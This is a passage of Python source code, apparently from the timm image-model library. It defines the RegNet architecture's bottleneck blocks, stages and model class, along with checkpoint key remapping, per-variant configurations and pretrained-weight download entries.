Otherwise, it's just redefining the arguments for groups/bottleneck channels.\n \"\"\"\n\n def __init__(\n self,\n in_chs,\n out_chs,\n stride=1,\n dilation=(1, 1),\n bottle_ratio=1,\n group_size=1,\n se_ratio=0.25,\n downsample='conv1x1',\n linear_out=False,\n act_layer=nn.ReLU,\n norm_layer=nn.BatchNorm2d,\n drop_block=None,\n drop_path_rate=0.,\n ):\n super(Bottleneck, self).__init__()\n act_layer = get_act_layer(act_layer)\n bottleneck_chs = int(round(out_chs * bottle_ratio))\n groups = bottleneck_chs // group_size\n\n cargs = dict(act_layer=act_layer, norm_layer=norm_layer)\n self.conv1 = ConvNormAct(in_chs, bottleneck_chs, kernel_size=1, **cargs)\n self.conv2 = ConvNormAct(\n bottleneck_chs,\n bottleneck_chs,\n kernel_size=3,\n stride=stride,\n dilation=dilation[0],\n groups=groups,\n drop_layer=drop_block,\n **cargs,\n )\n if se_ratio:\n se_channels = int(round(in_chs * se_ratio))\n self.se = SEModule(bottleneck_chs, rd_channels=se_channels, act_layer=act_layer)\n else:\n self.se = nn.Identity()\n self.conv3 = ConvNormAct(bottleneck_chs, out_chs, kernel_size=1, apply_act=False, **cargs)\n self.act3 = nn.Identity() if linear_out else act_layer()\n self.downsample = create_shortcut(\n downsample,\n in_chs,\n out_chs,\n kernel_size=1,\n stride=stride,\n dilation=dilation,\n norm_layer=norm_layer,\n )\n self.drop_path = DropPath(drop_path_rate) if drop_path_rate > 0 else nn.Identity()\n\n def zero_init_last(self):\n nn.init.zeros_(self.conv3.bn.weight)\n\n def forward(self, x):\n shortcut = x\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.se(x)\n x = self.conv3(x)\n if self.downsample is not None:\n # NOTE stuck with downsample as the attr name due to weight compatibility\n # now represents the shortcut, no shortcut if None, and non-downsample shortcut == nn.Identity()\n x = self.drop_path(x) + self.downsample(shortcut)\n x = self.act3(x)\n return x\n\n\nclass PreBottleneck(nn.Module):\n \"\"\" RegNet Bottleneck\n\n This is almost exactly the same as a ResNet Bottlneck. The main difference is the SE block is moved from\n after conv3 to after conv2. 
Otherwise, it's just redefining the arguments for groups/bottleneck channels.\n \"\"\"\n\n def __init__(\n self,\n in_chs,\n out_chs,\n stride=1,\n dilation=(1, 1),\n bottle_ratio=1,\n group_size=1,\n se_ratio=0.25,\n downsample='conv1x1',\n linear_out=False,\n act_layer=nn.ReLU,\n norm_layer=nn.BatchNorm2d,\n drop_block=None,\n drop_path_rate=0.,\n ):\n super(PreBottleneck, self).__init__()\n norm_act_layer = get_norm_act_layer(norm_layer, act_layer)\n bottleneck_chs = int(round(out_chs * bottle_ratio))\n groups = bottleneck_chs // group_size\n\n self.norm1 = norm_act_layer(in_chs)\n self.conv1 = create_conv2d(in_chs, bottleneck_chs, kernel_size=1)\n self.norm2 = norm_act_layer(bottleneck_chs)\n self.conv2 = create_conv2d(\n bottleneck_chs,\n bottleneck_chs,\n kernel_size=3,\n stride=stride,\n dilation=dilation[0],\n groups=groups,\n )\n if se_ratio:\n se_channels = int(round(in_chs * se_ratio))\n self.se = SEModule(bottleneck_chs, rd_channels=se_channels, act_layer=act_layer)\n else:\n self.se = nn.Identity()\n self.norm3 = norm_act_layer(bottleneck_chs)\n self.conv3 = create_conv2d(bottleneck_chs, out_chs, kernel_size=1)\n self.downsample = create_shortcut(\n downsample,\n in_chs,\n out_chs,\n kernel_size=1,\n stride=stride,\n dilation=dilation,\n preact=True,\n )\n self.drop_path = DropPath(drop_path_rate) if drop_path_rate > 0 else nn.Identity()\n\n def zero_init_last(self):\n pass\n\n def forward(self, x):\n x = self.norm1(x)\n shortcut = x\n x = self.conv1(x)\n x = self.norm2(x)\n x = self.conv2(x)\n x = self.se(x)\n x = self.norm3(x)\n x = self.conv3(x)\n if self.downsample is not None:\n # NOTE stuck with downsample as the attr name due to weight compatibility\n # now represents the shortcut, no shortcut if None, and non-downsample shortcut == nn.Identity()\n x = self.drop_path(x) + self.downsample(shortcut)\n return x\n\n\nclass RegStage(nn.Module):\n \"\"\"Stage (sequence of blocks w/ the same output shape).\"\"\"\n\n def __init__(\n self,\n depth,\n in_chs,\n out_chs,\n stride,\n dilation,\n drop_path_rates=None,\n block_fn=Bottleneck,\n **block_kwargs,\n ):\n super(RegStage, self).__init__()\n self.grad_checkpointing = False\n\n first_dilation = 1 if dilation in (1, 2) else 2\n for i in range(depth):\n block_stride = stride if i == 0 else 1\n block_in_chs = in_chs if i == 0 else out_chs\n block_dilation = (first_dilation, dilation)\n dpr = drop_path_rates[i] if drop_path_rates is not None else 0.\n name = \"b{}\".format(i + 1)\n self.add_module(\n name,\n block_fn(\n block_in_chs,\n out_chs,\n stride=block_stride,\n dilation=block_dilation,\n drop_path_rate=dpr,\n **block_kwargs,\n )\n )\n first_dilation = dilation\n\n def forward(self, x):\n if self.grad_checkpointing and not torch.jit.is_scripting():\n x = checkpoint_seq(self.children(), x)\n else:\n for block in self.children():\n x = block(x)\n return x\n\n\nclass RegNet(nn.Module):\n \"\"\"RegNet-X, Y, and Z Models\n\n Paper: https://arxiv.org/abs/2003.13678\n Original Impl: https://github.com/facebookresearch/pycls/blob/master/pycls/models/regnet.py\n \"\"\"\n\n def __init__(\n self,\n cfg: RegNetCfg,\n in_chans=3,\n num_classes=1000,\n output_stride=32,\n global_pool='avg',\n drop_rate=0.,\n drop_path_rate=0.,\n zero_init_last=True,\n **kwargs,\n ):\n \"\"\"\n\n Args:\n cfg (RegNetCfg): Model architecture configuration\n in_chans (int): Number of input channels (default: 3)\n num_classes (int): Number of classifier classes (default: 1000)\n output_stride (int): Output stride of network, one of (8, 16, 32) (default: 
32)\n global_pool (str): Global pooling type (default: 'avg')\n drop_rate (float): Dropout rate (default: 0.)\n drop_path_rate (float): Stochastic depth drop-path rate (default: 0.)\n zero_init_last (bool): Zero-init last weight of residual path\n kwargs (dict): Extra kwargs overlayed onto cfg\n \"\"\"\n super().__init__()\n self.num_classes = num_classes\n self.drop_rate = drop_rate\n assert output_stride in (8, 16, 32)\n cfg = replace(cfg, **kwargs) # update cfg with extra passed kwargs\n\n # Construct the stem\n stem_width = cfg.stem_width\n na_args = dict(act_layer=cfg.act_layer, norm_layer=cfg.norm_layer)\n if cfg.preact:\n self.stem = create_conv2d(in_chans, stem_width, 3, stride=2)\n else:\n self.stem = ConvNormAct(in_chans, stem_width, 3, stride=2, **na_args)\n self.feature_info = [dict(num_chs=stem_width, reduction=2, module='stem')]\n\n # Construct the stages\n prev_width = stem_width\n curr_stride = 2\n per_stage_args, common_args = self._get_stage_args(\n cfg,\n output_stride=output_stride,\n drop_path_rate=drop_path_rate,\n )\n assert len(per_stage_args) == 4\n block_fn = PreBottleneck if cfg.preact else Bottleneck\n for i, stage_args in enumerate(per_stage_args):\n stage_name = \"s{}\".format(i + 1)\n self.add_module(\n stage_name,\n RegStage(\n in_chs=prev_width,\n block_fn=block_fn,\n **stage_args,\n **common_args,\n )\n )\n prev_width = stage_args['out_chs']\n curr_stride *= stage_args['stride']\n self.feature_info += [dict(num_chs=prev_width, reduction=curr_stride, module=stage_name)]\n\n # Construct the head\n if cfg.num_features:\n self.final_conv = ConvNormAct(prev_width, cfg.num_features, kernel_size=1, **na_args)\n self.num_features = cfg.num_features\n else:\n final_act = cfg.linear_out or cfg.preact\n self.final_conv = get_act_layer(cfg.act_layer)() if final_act else nn.Identity()\n self.num_features = prev_width\n self.head = ClassifierHead(\n in_features=self.num_features,\n num_classes=num_classes,\n pool_type=global_pool,\n drop_rate=drop_rate,\n )\n\n named_apply(partial(_init_weights, zero_init_last=zero_init_last), self)\n\n def _get_stage_args(self, cfg: RegNetCfg, default_stride=2, output_stride=32, drop_path_rate=0.):\n # Generate RegNet ws per block\n widths, num_stages, stage_gs = generate_regnet(cfg.wa, cfg.w0, cfg.wm, cfg.depth, cfg.group_size)\n\n # Convert to per stage format\n stage_widths, stage_depths = np.unique(widths, return_counts=True)\n stage_br = [cfg.bottle_ratio for _ in range(num_stages)]\n stage_strides = []\n stage_dilations = []\n net_stride = 2\n dilation = 1\n for _ in range(num_stages):\n if net_stride >= output_stride:\n dilation *= default_stride\n stride = 1\n else:\n stride = default_stride\n net_stride *= stride\n stage_strides.append(stride)\n stage_dilations.append(dilation)\n stage_dpr = np.split(np.linspace(0, drop_path_rate, sum(stage_depths)), np.cumsum(stage_depths[:-1]))\n\n # Adjust the compatibility of ws and gws\n stage_widths, stage_gs = adjust_widths_groups_comp(\n stage_widths, stage_br, stage_gs, min_ratio=cfg.group_min_ratio)\n arg_names = ['out_chs', 'stride', 'dilation', 'depth', 'bottle_ratio', 'group_size', 'drop_path_rates']\n per_stage_args = [\n dict(zip(arg_names, params)) for params in\n zip(stage_widths, stage_strides, stage_dilations, stage_depths, stage_br, stage_gs, stage_dpr)\n ]\n common_args = dict(\n downsample=cfg.downsample,\n se_ratio=cfg.se_ratio,\n linear_out=cfg.linear_out,\n act_layer=cfg.act_layer,\n norm_layer=cfg.norm_layer,\n )\n return per_stage_args, common_args\n\n 
@torch.jit.ignore\n def group_matcher(self, coarse=False):\n return dict(\n stem=r'^stem',\n blocks=r'^s(\\d+)' if coarse else r'^s(\\d+)\\.b(\\d+)',\n )\n\n @torch.jit.ignore\n def set_grad_checkpointing(self, enable=True):\n for s in list(self.children())[1:-1]:\n s.grad_checkpointing = enable\n\n @torch.jit.ignore\n def get_classifier(self):\n return self.head.fc\n\n def reset_classifier(self, num_classes, global_pool='avg'):\n self.head.reset(num_classes, pool_type=global_pool)\n\n def forward_features(self, x):\n x = self.stem(x)\n x = self.s1(x)\n x = self.s2(x)\n x = self.s3(x)\n x = self.s4(x)\n x = self.final_conv(x)\n return x\n\n def forward_head(self, x, pre_logits: bool = False):\n return self.head(x, pre_logits=pre_logits)\n\n def forward(self, x):\n x = self.forward_features(x)\n x = self.forward_head(x)\n return x\n\n\ndef _init_weights(module, name='', zero_init_last=False):\n if isinstance(module, nn.Conv2d):\n fan_out = module.kernel_size[0] * module.kernel_size[1] * module.out_channels\n fan_out //= module.groups\n module.weight.data.normal_(0, math.sqrt(2.0 / fan_out))\n if module.bias is not None:\n module.bias.data.zero_()\n elif isinstance(module, nn.Linear):\n nn.init.normal_(module.weight, mean=0.0, std=0.01)\n if module.bias is not None:\n nn.init.zeros_(module.bias)\n elif zero_init_last and hasattr(module, 'zero_init_last'):\n module.zero_init_last()\n\n\ndef _filter_fn(state_dict):\n state_dict = state_dict.get('model', state_dict)\n replaces = [\n ('f.a.0', 'conv1.conv'),\n ('f.a.1', 'conv1.bn'),\n ('f.b.0', 'conv2.conv'),\n ('f.b.1', 'conv2.bn'),\n ('f.final_bn', 'conv3.bn'),\n ('f.se.excitation.0', 'se.fc1'),\n ('f.se.excitation.2', 'se.fc2'),\n ('f.se', 'se'),\n ('f.c.0', 'conv3.conv'),\n ('f.c.1', 'conv3.bn'),\n ('f.c', 'conv3.conv'),\n ('proj.0', 'downsample.conv'),\n ('proj.1', 'downsample.bn'),\n ('proj', 'downsample.conv'),\n ]\n if 'classy_state_dict' in state_dict:\n # classy-vision & vissl (SEER) weights\n import re\n state_dict = state_dict['classy_state_dict']['base_model']['model']\n out = {}\n for k, v in state_dict['trunk'].items():\n k = k.replace('_feature_blocks.conv1.stem.0', 'stem.conv')\n k = k.replace('_feature_blocks.conv1.stem.1', 'stem.bn')\n k = re.sub(\n r'^_feature_blocks.res\\d.block(\\d)-(\\d+)',\n lambda x: f's{int(x.group(1))}.b{int(x.group(2)) + 1}', k)\n k = re.sub(r's(\\d)\\.b(\\d+)\\.bn', r's\\1.b\\2.downsample.bn', k)\n for s, r in replaces:\n k = k.replace(s, r)\n out[k] = v\n for k, v in state_dict['heads'].items():\n if 'projection_head' in k or 'prototypes' in k:\n continue\n k = k.replace('0.clf.0', 'head.fc')\n out[k] = v\n return out\n if 'stem.0.weight' in state_dict:\n # torchvision weights\n import re\n out = {}\n for k, v in state_dict.items():\n k = k.replace('stem.0', 'stem.conv')\n k = k.replace('stem.1', 'stem.bn')\n k = re.sub(\n r'trunk_output.block(\\d)\\.block(\\d+)\\-(\\d+)',\n lambda x: f's{int(x.group(1))}.b{int(x.group(3)) + 1}', k)\n for s, r in replaces:\n k = k.replace(s, r)\n k = k.replace('fc.', 'head.fc.')\n out[k] = v\n return out\n return state_dict\n\n\n# Model FLOPS = three trailing digits * 10^8\nmodel_cfgs = dict(\n # RegNet-X\n regnetx_002=RegNetCfg(w0=24, wa=36.44, wm=2.49, group_size=8, depth=13),\n regnetx_004=RegNetCfg(w0=24, wa=24.48, wm=2.54, group_size=16, depth=22),\n regnetx_004_tv=RegNetCfg(w0=24, wa=24.48, wm=2.54, group_size=16, depth=22, group_min_ratio=0.9),\n regnetx_006=RegNetCfg(w0=48, wa=36.97, wm=2.24, group_size=24, depth=16),\n regnetx_008=RegNetCfg(w0=56, wa=35.73, 
wm=2.28, group_size=16, depth=16),\n regnetx_016=RegNetCfg(w0=80, wa=34.01, wm=2.25, group_size=24, depth=18),\n regnetx_032=RegNetCfg(w0=88, wa=26.31, wm=2.25, group_size=48, depth=25),\n regnetx_040=RegNetCfg(w0=96, wa=38.65, wm=2.43, group_size=40, depth=23),\n regnetx_064=RegNetCfg(w0=184, wa=60.83, wm=2.07, group_size=56, depth=17),\n regnetx_080=RegNetCfg(w0=80, wa=49.56, wm=2.88, group_size=120, depth=23),\n regnetx_120=RegNetCfg(w0=168, wa=73.36, wm=2.37, group_size=112, depth=19),\n regnetx_160=RegNetCfg(w0=216, wa=55.59, wm=2.1, group_size=128, depth=22),\n regnetx_320=RegNetCfg(w0=320, wa=69.86, wm=2.0, group_size=168, depth=23),\n\n # RegNet-Y\n regnety_002=RegNetCfg(w0=24, wa=36.44, wm=2.49, group_size=8, depth=13, se_ratio=0.25),\n regnety_004=RegNetCfg(w0=48, wa=27.89, wm=2.09, group_size=8, depth=16, se_ratio=0.25),\n regnety_006=RegNetCfg(w0=48, wa=32.54, wm=2.32, group_size=16, depth=15, se_ratio=0.25),\n regnety_008=RegNetCfg(w0=56, wa=38.84, wm=2.4, group_size=16, depth=14, se_ratio=0.25),\n regnety_008_tv=RegNetCfg(w0=56, wa=38.84, wm=2.4, group_size=16, depth=14, se_ratio=0.25, group_min_ratio=0.9),\n regnety_016=RegNetCfg(w0=48, wa=20.71, wm=2.65, group_size=24, depth=27, se_ratio=0.25),\n regnety_032=RegNetCfg(w0=80, wa=42.63, wm=2.66, group_size=24, depth=21, se_ratio=0.25),\n regnety_040=RegNetCfg(w0=96, wa=31.41, wm=2.24, group_size=64, depth=22, se_ratio=0.25),\n regnety_064=RegNetCfg(w0=112, wa=33.22, wm=2.27, group_size=72, depth=25, se_ratio=0.25),\n regnety_080=RegNetCfg(w0=192, wa=76.82, wm=2.19, group_size=56, depth=17, se_ratio=0.25),\n regnety_080_tv=RegNetCfg(w0=192, wa=76.82, wm=2.19, group_size=56, depth=17, se_ratio=0.25, group_min_ratio=0.9),\n regnety_120=RegNetCfg(w0=168, wa=73.36, wm=2.37, group_size=112, depth=19, se_ratio=0.25),\n regnety_160=RegNetCfg(w0=200, wa=106.23, wm=2.48, group_size=112, depth=18, se_ratio=0.25),\n regnety_320=RegNetCfg(w0=232, wa=115.89, wm=2.53, group_size=232, depth=20, se_ratio=0.25),\n regnety_640=RegNetCfg(w0=352, wa=147.48, wm=2.4, group_size=328, depth=20, se_ratio=0.25),\n regnety_1280=RegNetCfg(w0=456, wa=160.83, wm=2.52, group_size=264, depth=27, se_ratio=0.25),\n regnety_2560=RegNetCfg(w0=640, wa=230.83, wm=2.53, group_size=373, depth=27, se_ratio=0.25),\n #regnety_2560=RegNetCfg(w0=640, wa=124.47, wm=2.04, group_size=848, depth=27, se_ratio=0.25),\n\n # Experimental\n regnety_040_sgn=RegNetCfg(\n w0=96, wa=31.41, wm=2.24, group_size=64, depth=22, se_ratio=0.25,\n act_layer='silu', norm_layer=partial(GroupNormAct, group_size=16)),\n\n # regnetv = 'preact regnet y'\n regnetv_040=RegNetCfg(\n depth=22, w0=96, wa=31.41, wm=2.24, group_size=64, se_ratio=0.25, preact=True, act_layer='silu'),\n regnetv_064=RegNetCfg(\n depth=25, w0=112, wa=33.22, wm=2.27, group_size=72, se_ratio=0.25, preact=True, act_layer='silu',\n downsample='avg'),\n\n # RegNet-Z (unverified)\n regnetz_005=RegNetCfg(\n depth=21, w0=16, wa=10.7, wm=2.51, group_size=4, bottle_ratio=4.0, se_ratio=0.25,\n downsample=None, linear_out=True, num_features=1024, act_layer='silu',\n ),\n regnetz_040=RegNetCfg(\n depth=28, w0=48, wa=14.5, wm=2.226, group_size=8, bottle_ratio=4.0, se_ratio=0.25,\n downsample=None, linear_out=True, num_features=0, act_layer='silu',\n ),\n regnetz_040_h=RegNetCfg(\n depth=28, w0=48, wa=14.5, wm=2.226, group_size=8, bottle_ratio=4.0, se_ratio=0.25,\n downsample=None, linear_out=True, num_features=1536, act_layer='silu',\n ),\n)\n\n\ndef _create_regnet(variant, pretrained, **kwargs):\n return build_model_with_cfg(\n RegNet, 
variant, pretrained,\n model_cfg=model_cfgs[variant],\n pretrained_filter_fn=_filter_fn,\n **kwargs)\n\n\ndef _cfg(url='', **kwargs):\n return {\n 'url': url, 'num_classes': 1000, 'input_size': (3, 224, 224), 'pool_size': (7, 7),\n 'test_input_size': (3, 288, 288), 'crop_pct': 0.95, 'test_crop_pct': 1.0,\n 'interpolation': 'bicubic', 'mean': IMAGENET_DEFAULT_MEAN, 'std': IMAGENET_DEFAULT_STD,\n 'first_conv': 'stem.conv', 'classifier': 'head.fc',\n **kwargs\n }\n\n\ndef _cfgpyc(url='', **kwargs):\n return {\n 'url': url, 'num_classes': 1000, 'input_size': (3, 224, 224), 'pool_size': (7, 7),\n 'crop_pct': 0.875, 'interpolation': 'bicubic',\n 'mean': IMAGENET_DEFAULT_MEAN, 'std': IMAGENET_DEFAULT_STD,\n 'first_conv': 'stem.conv', 'classifier': 'head.fc',\n 'license': 'mit', 'origin_url': 'https://github.com/facebookresearch/pycls', **kwargs\n }\n\n\ndef _cfgtv2(url='', **kwargs):\n return {\n 'url': url, 'num_classes': 1000, 'input_size': (3, 224, 224), 'pool_size': (7, 7),\n 'crop_pct': 0.965, 'interpolation': 'bicubic',\n 'mean': IMAGENET_DEFAULT_MEAN, 'std': IMAGENET_DEFAULT_STD,\n 'first_conv': 'stem.conv', 'classifier': 'head.fc',\n 'license': 'bsd-3-clause', 'origin_url': 'https://github.com/pytorch/vision', **kwargs\n }\n\n\ndefault_cfgs = generate_default_cfgs({\n # timm trained models\n 'regnety_032.ra_in1k': _cfg(\n hf_hub_id='timm/',\n url='https://github.com/huggingface/pytorch-image-models/releases/download/v0.1-weights/regnety_032_ra-7f2439f9.pth'),\n 'regnety_040.ra3_in1k': _cfg(\n hf_hub_id='timm/',\n url='https://github.com/huggingface/pytorch-image-models/releases/download/v0.1-tpu-weights/regnety_040_ra3-670e1166.pth'),\n 'regnety_064.ra3_in1k': _cfg(\n hf_hub_id='timm/',\n url='https://github.com/huggingface/pytorch-image-models/releases/download/v0.1-tpu-weights/regnety_064_ra3-aa26dc7d.pth'),\n 'regnety_080.ra3_in1k': _cfg(\n hf_hub_id='timm/',\n url='https://github.com/huggingface/pytorch-image-models/releases/download/v0.1-tpu-weights/regnety_080_ra3-1fdc4344.pth'),\n 'regnety_120.sw_in12k_ft_in1k': _cfg(hf_hub_id='timm/'),\n 'regnety_160.sw_in12k_ft_in1k': _cfg(hf_hub_id='timm/'),\n 'regnety_160.lion_in12k_ft_in1k': _cfg(hf_hub_id='timm/'),\n\n # timm in12k pretrain\n 'regnety_120.sw_in12k': _cfg(\n hf_hub_id='timm/',\n num_classes=11821),\n 'regnety_160.sw_in12k': _cfg(\n hf_hub_id='timm/',\n num_classes=11821),\n\n # timm custom arch (v and z guess) + trained models\n 'regnety_040_sgn.untrained': _cfg(url=''),\n 'regnetv_040.ra3_in1k': _cfg(\n hf_hub_id='timm/',\n url='https://github.com/huggingface/pytorch-image-models/releases/download/v0.1-tpu-weights/regnetv_040_ra3-c248f51f.pth',\n first_conv='stem'),\n 'regnetv_064.ra3_in1k': _cfg(\n hf_hub_id='timm/',\n url='https://github.com/huggingface/pytorch-image-models/releases/download/v0.1-tpu-weights/regnetv_064_ra3-530616c2.pth',\n first_conv='stem'),\n\n 'regnetz_005.untrained': _cfg(url=''),\n 'regnetz_040.ra3_in1k': _cfg(\n hf_hub_id='timm/',\n url='https://github.com/huggingface/pytorch-image-models/releases/download/v0.1-tpu-weights/regnetz_040_ra3-9007edf5.pth',\n input_size=(3, 256, 256), pool_size=(8, 8), crop_pct=1.0, test_input_size=(3, 320, 320)),\n 'regnetz_040_h.ra3_in1k': _cfg(\n hf_hub_id='timm/',\n url='https://github.com/huggingface/pytorch-image-models/releases/download/v0.1-tpu-weights/regnetz_040h_ra3-f594343b.pth',\n input_size=(3, 256, 256), pool_size=(8, 8), crop_pct=1.0, test_input_size=(3, 320, 320)),\n\n # used in DeiT for distillation (from Facebook DeiT GitHub repository)\n 
'regnety_160.deit_in1k': _cfg(\n hf_hub_id='timm/', url='https://dl.fbaipublicfiles.com/deit/regnety_160-a5fe301d.pth'),\n\n 'regnetx_004_tv.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_x_400mf-62229a5f.pth'),\n 'regnetx_008.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_x_800mf-94a99ebd.pth'),\n 'regnetx_016.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_x_1_6gf-a12f2b72.pth'),\n 'regnetx_032.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_x_3_2gf-7071aa85.pth'),\n 'regnetx_080.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_x_8gf-2b70d774.pth'),\n 'regnetx_160.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_x_16gf-ba3796d7.pth'),\n 'regnetx_320.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_x_32gf-6eb8fdc6.pth'),\n\n 'regnety_004.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_400mf-e6988f5f.pth'),\n 'regnety_008_tv.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_800mf-58fc7688.pth'),\n 'regnety_016.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_1_6gf-0d7bc02a.pth'),\n 'regnety_032.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_3_2gf-9180c971.pth'),\n 'regnety_080_tv.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_8gf-dc2b1b54.pth'),\n 'regnety_160.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_16gf-3e4a00f9.pth'),\n 'regnety_320.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_32gf-8db6d4b5.pth'),\n\n 'regnety_160.swag_ft_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_16gf_swag-43afe44d.pth', license='cc-by-nc-4.0',\n input_size=(3, 384, 384), pool_size=(12, 12), crop_pct=1.0),\n 'regnety_320.swag_ft_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_32gf_swag-04fdfa75.pth', license='cc-by-nc-4.0',\n input_size=(3, 384, 384), pool_size=(12, 12), crop_pct=1.0),\n 'regnety_1280.swag_ft_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_128gf_swag-c8ce3e52.pth', license='cc-by-nc-4.0',\n input_size=(3, 384, 384), pool_size=(12, 12), crop_pct=1.0),\n\n 'regnety_160.swag_lc_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_16gf_lc_swag-f3ec0043.pth', license='cc-by-nc-4.0'),\n 'regnety_320.swag_lc_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_32gf_lc_swag-e1583746.pth', license='cc-by-nc-4.0'),\n 'regnety_1280.swag_lc_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_128gf_lc_swag-cbe8ce12.pth', license='cc-by-nc-4.0'),\n\n 'regnety_320.seer_ft_in1k': _cfgtv2(\n hf_hub_id='timm/',\n license='other', origin_url='https://github.com/facebookresearch/vissl',\n url='https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_finetuned/seer_regnet32_finetuned_in1k_model_final_checkpoint_phase78.torch',\n input_size=(3, 384, 384), pool_size=(12, 12), crop_pct=1.0),\n 'regnety_640.seer_ft_in1k': _cfgtv2(\n hf_hub_id='timm/',\n license='other', 
origin_url='https://github.com/facebookresearch/vissl',\n url='https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_finetuned/seer_regnet64_finetuned_in1k_model_final_checkpoint_phase78.torch',\n input_size=(3, 384, 384), pool_size=(12, 12), crop_pct=1.0),\n 'regnety_1280.seer_ft_in1k': _cfgtv2(\n hf_hub_id='timm/',\n license='other', origin_url='https://github.com/facebookresearch/vissl',\n url='https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_finetuned/seer_regnet128_finetuned_in1k_model_final_checkpoint_phase78.torch',\n input_size=(3, 384, 384), pool_size=(12, 12), crop_pct=1.0),\n 'regnety_2560.seer_ft_in1k': _cfgtv2(\n hf_hub_id='timm/',\n license='other', origin_url='https://github.com/facebookresearch/vissl',\n url='https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_finetuned/seer_regnet256_finetuned_in1k_model_final_checkpoint_phase38.torch',\n input_size=(3, 384, 384), pool_size=(12, 12), crop_pct=1.0),\n\n 'regnety_320.seer': _cfgtv2(\n hf_hub_id='timm/',\n url='https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_regnet32d/seer_regnet32gf_model_iteration244000.torch',\n num_classes=0, license='other', origin_url='https://github.com/facebookresearch/vissl'),\n 'regnety_640.seer': _cfgtv2(\n hf_hub_id='timm/',\n url='https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_regnet64/seer_regnet64gf_model_final_checkpoint_phase0.torch',\n num_classes=0, license='other', origin_url='https://github.com/facebookresearch/vissl'),\n 'regnety_1280.seer': _cfgtv2(\n hf_hub_id='timm/',\n url='https://dl.fbaipublicfiles.com/vissl/model_zoo/swav_ig1b_regnet128Gf_cnstant_bs32_node16_sinkhorn10_proto16k_syncBN64_warmup8k/model_final_checkpoint_phase0.torch',\n num_classes=0, license='other', origin_url='https://github.com/facebookresearch/vissl'),\n # FIXME invalid weight <-> model match, mistake on their end\n #'regnety_2560.seer': _cfgtv2(\n # url='https://dl.fbaipublicfiles.com/vissl/model_zoo/swav_ig1b_cosine_rg256gf_noBNhead_wd1e5_fairstore_bs16_node64_sinkhorn10_proto16k_apex_syncBN64_warmup8k/model_final_checkpoint_phase0.torch',\n # num_classes=0, license='other', origin_url='https://github.com/facebookresearch/vissl'),\n\n 'regnetx_002.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_004.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_006.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_008.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_016.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_032.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_040.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_064.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_080.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_120.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_160.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_320.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n\n 'regnety_002.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_004.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_006.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_008.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_016.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_032.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_040.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_064.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_080.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_120.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_160.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_320.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n})\n\n\n@register_model\ndef 
